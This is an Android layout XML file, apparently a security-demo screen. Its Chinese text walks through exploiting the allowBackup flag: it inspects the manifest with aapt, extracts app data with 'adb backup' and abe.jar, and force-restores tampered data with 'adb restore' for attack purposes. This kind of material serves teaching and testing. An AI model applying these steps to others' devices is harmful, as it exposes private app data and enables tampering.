<?xml version="1.0" encoding="utf-8"?>
<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
    android:layout_width="match_parent"
    android:layout_height="match_parent">

    <LinearLayout
        android:layout_width="match_parent"
        android:layout_height="match_parent"
        android:layout_margin="8dp"
        android:orientation="vertical">

        <TextView
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:text="步骤1：下载apk，之后使用aapt查看AndroidManifest.xml内容" />

        <TextView
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:text="命令：" />

        <TextView
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:text="aapt dump xmltree appName.apk AndroidManifest.xml > D:\demo.txt" />

        <TextView
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:text="若allowBackup属性值设置为true，表示apk数据可备份" />

        <TextView
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:layout_marginTop="8dp"
            android:text="步骤2：使用命令进行数据备份" />

        <TextView
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:text="命令：adb backup -f appName.ab packageName" />

        <TextView
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:text="其中，appName.ab是备份文件，packageName是需要备份数据App的包名" />

        <TextView
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:layout_marginTop="8dp"
            android:text="步骤3：使用android-backup-extractor(abe)工具来解析ab文件" />

        <TextView
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:text="命令：java -jar abe.jar unpack appName.ab appName.tar" />

        <TextView
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:text="appName.tar是abe解析ab得到的压缩文件，也就是App的备份数据" />

        <TextView
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:layout_marginTop="8dp"
            android:text="步骤4：同时我们可以利用这个漏洞进行数据恢复" />

        <TextView
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:text="命令：adb restore appName.ab" />

        <TextView
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:text="利用这个命令我们可以利用备份数据对App进行强行数据恢复，达到一些攻击目的" />

    </LinearLayout>

</LinearLayout>